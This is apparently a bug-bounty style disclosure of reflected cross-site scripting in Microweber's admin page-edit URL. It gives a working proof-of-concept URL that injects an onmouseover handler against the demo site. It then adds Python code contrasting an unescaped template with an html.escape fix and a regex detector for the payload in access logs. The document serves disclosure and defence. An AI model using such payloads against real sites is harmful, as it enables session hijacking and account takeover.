Cross-site Scripting (XSS) - Reflected in microweber/microweber
Feb 19th 2022
Hi, the endpoint https://demo.microweber.org/demo/admin/page is vulnerable to reflected cross-site scripting: a path segment of the page edit URL is reflected into an HTML attribute without encoding, so a double quote in the segment closes the attribute and anything after it is parsed as new attributes.
Proof of Concept
Navigate to the PoC URL: https://demo.microweber.org/demo/admin/page/8tojh1%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22yrr2n/edit
Then move the mouse anywhere on the page; the injected onmouseover handler fires and an XSS alert pops up.
(Log in if the site asks.)
Cross-site scripting attacks can lead to account takeover via cookie theft, temporary site defacement, redirection of users to attacker-controlled sites, etc.
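The following Python example is added here and is not part of the report or of Microweber's code. It decodes the PoC path segment quoted above, renders it through a hypothetical template the way the vulnerable endpoint must (straight into a quoted attribute) and through the same template with HTML attribute encoding, and shows which attributes a browser would see in each case. It also runs a small detector over constructed access-log lines to flag requests whose decoded path contains a quote followed by an event-handler attribute, which is the pattern this PoC relies on. The template markup, the log lines and the `page_id` attribute name are assumptions for illustration.

```python
import html
import re
from urllib.parse import unquote

# Path segment copied from the PoC URL in the report, still URL-encoded.
POC_ENCODED = (
    "8tojh1%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3b"
    "width%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22yrr2n"
)
# What the server sees after URL decoding: a quote, then attribute-looking text.
POC_DECODED = unquote(POC_ENCODED)

# A double quote immediately followed by an attribute name and '=' inside a tag
# means the original attribute value was closed early and a new one injected.
INJECTED_ATTR = re.compile(r'"([A-Za-z-]+)=')


def render_vulnerable(page_id: str) -> str:
    """Hypothetical template: untrusted path segment dropped into an attribute as-is."""
    return f'<input name="page_id" value="{page_id}">'


def render_fixed(page_id: str) -> str:
    """Same template with attribute encoding: quote=True turns " into &quot;."""
    return f'<input name="page_id" value="{html.escape(page_id, quote=True)}">'


def injected_attributes(rendered: str) -> list:
    """Names of attributes that appear right after a closing quote (i.e. injected ones)."""
    return INJECTED_ATTR.findall(rendered)


# --- detection over access-log lines (constructed sample, not from the report) ---

# Decoded request path containing a quote followed by on<event>= is the signature
# of an attribute-breakout XSS attempt like the PoC above.
EVENT_HANDLER_IN_PATH = re.compile(r'"\s*on[a-z]+\s*=', re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) ')

SAMPLE_LOG = [
    '203.0.113.5 - - [19/Feb/2022:10:01:02 +0000] "GET /demo/admin/page/12/edit HTTP/1.1" 200 5120',
    f'203.0.113.5 - - [19/Feb/2022:10:01:09 +0000] "GET /demo/admin/page/{POC_ENCODED}/edit HTTP/1.1" 200 5388',
    '198.51.100.7 - - [19/Feb/2022:10:02:00 +0000] "GET /demo/admin/page/7%22/edit HTTP/1.1" 404 210',
]


def flag_suspicious_requests(lines) -> list:
    """Return the raw (still encoded) paths whose decoded form matches the XSS pattern."""
    flagged = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        raw_path = m.group(1)
        # Decode before matching; the PoC hides the quote and '=' as %22 and %3d.
        if EVENT_HANDLER_IN_PATH.search(unquote(raw_path)):
            flagged.append(raw_path)
    return flagged


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(POC_DECODED))
    print("  injected attributes:", injected_attributes(render_vulnerable(POC_DECODED)))
    print("fixed:     ", render_fixed(POC_DECODED))
    print("  injected attributes:", injected_attributes(render_fixed(POC_DECODED)))
    print("flagged requests:", flag_suspicious_requests(SAMPLE_LOG))
```

With the unencoded template the rendered tag gains `onmouseover` and `style` attributes; after `html.escape(..., quote=True)` the whole segment stays inside the `value` attribute and no handler is created. The log check deliberately matches only a quote followed by an `on…=` name, so a lone `%22` in a path (third sample line) is not flagged.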